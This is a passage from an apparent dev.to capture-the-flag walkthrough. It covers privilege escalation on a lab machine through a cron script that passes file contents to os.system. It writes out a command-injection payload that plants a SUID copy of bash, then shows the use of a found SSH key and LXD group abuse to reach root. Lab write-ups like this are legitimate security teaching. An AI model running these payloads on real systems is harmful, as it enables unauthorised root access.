&lt;span class="c1"&gt;#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="n"&gt;lines&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/opt/.dads_scripts/.files/.quotes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;splitlines&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;quote&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lines&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;wall &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;quote&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The script was picking a random quote from &lt;code&gt;/opt/.dads_scripts/.files/.quotes&lt;/code&gt; and concatenating it directly with the &lt;code&gt;wall&lt;/code&gt; command. That file with quotes was writable. Since &lt;code&gt;os.system("wall " + quote)&lt;/code&gt; passes the string straight to the shell, the file was overwritten with a payload that copies &lt;code&gt;/bin/bash&lt;/code&gt; to &lt;code&gt;/tmp/bash&lt;/code&gt; and sets the SUID bit on it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&amp;amp;&amp;amp; cp /bin/bash /tmp/bash &amp;amp;&amp;amp; chmod +s /tmp/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; .quotes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fired again:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58xc9mbfss2omsuw4sl9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58xc9mbfss2omsuw4sl9.png" alt="cron exploit command in pspy64" width="773" height="122"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A Cage-privileged shell was obtained by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/tmp/bash &lt;span class="nt"&gt;-p&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, this gives a process running with Cage's privileges via SUID, not a full interactive shell. To get a proper shell, instead of generating a new SSH key, an existing private key was found at &lt;code&gt;/home/cage/.ssh/id_rsa&lt;/code&gt;. Copying it and using it to connect over SSH gave a full, stable shell as Cage.&lt;/p&gt;

&lt;p&gt;Flag located at: &lt;code&gt;/home/cage/Super_Duper_Checklist&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root, Vigenère in email (intended path)
&lt;/h2&gt;

&lt;p&gt;Inside &lt;code&gt;/home/cage/email_backup/email_3&lt;/code&gt; there was a suspicious encoded string.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3umev2ged1qr5579jz3t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3umev2ged1qr5579jz3t.png" alt="email string" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;First tried Caesar. No shift made sense. Tried Vigenère and it cracked with key &lt;code&gt;FACE&lt;/code&gt;. The decoded string turned out to be the root password. Logged in with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;su root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Flag located at: &lt;code&gt;/root/email_backup/email_2&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root, LXD (alternative path)
&lt;/h2&gt;

&lt;p&gt;Running &lt;code&gt;id&lt;/code&gt; after logging in as Cage:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6gety7db71q2r2k9luzu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6gety7db71q2r2k9luzu.png" alt="id command" width="793" height="50"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;User &lt;code&gt;cage&lt;/code&gt; is part of the &lt;code&gt;lxd&lt;/code&gt; group, which gives full control over the &lt;code&gt;lxd&lt;/code&gt; tool. This allows creating a container where you are root and mounting the host filesystem inside it (same concept as &lt;code&gt;docker&lt;/code&gt; group abuse).&lt;/p&gt;

&lt;p&gt;Transfer an Alpine Linux image to the machine (&lt;a href="https://github.com/saghul/lxd-alpine-builder.git" rel="noopener noreferrer"&gt;Alpine builder&lt;/a&gt;), then run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz &lt;span class="nt"&gt;--alias&lt;/span&gt; alpine
lxd init
lxc init alpine &lt;span class="o"&gt;[&lt;/span&gt;NAME-HERE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;lxc&lt;/code&gt; exploit is a bit tedious to do manually. Use this &lt;a href="https://github.com/initstring/lxd_root" rel="noopener noreferrer"&gt;script&lt;/a&gt;, transfer it to the machine and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./lxd_rootv1.sh &lt;span class="o"&gt;[&lt;/span&gt;NAME-HERE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If everything worked, running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;su
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;should drop into a root shell without asking for a password.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
  </channel>
</rss>
